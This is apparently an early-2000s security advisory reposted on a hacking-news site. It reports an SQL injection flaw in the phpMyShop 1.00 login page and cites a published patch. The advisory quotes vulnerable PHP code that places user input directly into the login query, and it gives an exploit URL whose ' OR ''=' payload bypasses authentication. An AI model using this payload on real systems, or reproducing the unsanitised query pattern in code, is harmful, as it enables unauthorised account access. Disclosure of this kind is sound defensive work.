Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » phpMyShop (php)

phpMyShop (php)

by Nikola Strahija on February 4th, 2003 There is SQL injection problem in phpMyShop application.


Informations :
같같같같같같같
Version : 1.00
Website : http://www.pc-encheres.com
Problem : SQL Injection


PHP Code/Location :
같같같같같같같같같
compte.php :
---------------------------------------------------------------
session_start();

if (isset($achat))
{
session_register("achat");
}
else
{
header("location:index.php");
}

include("design/header.php");
require("config.php");
require("fonction.php");

echo" size="$width_police2">Identification



";

if (isset($valider))
{
$sql = "SELECT id_cli,login_cli,pass_cli FROM $table_client where
login_cli='$identifiant' and pass_cli='$password'";
$sql = mysql_db_query($base,$sql);
$test = mysql_num_rows($sql);
if ($test=="0")
{
?>

echo"

Identifiant ou mot de passe non
valide!

";
}
else
{
$id_membre = mysql_result($sql,0,"id_cli");
session_register("id_membre");
?>

}
}

[...]
---------------------------------------------------------------



Exploit :
같같같같
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='


Solution :
같같같같같
A patch has been published on http://www.phpsecure.info .



More details :
같같같같같같같
In French :
http://www.frog-man.org/tutos/phpmyshop.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphpmyshop.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools



[email protected]


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »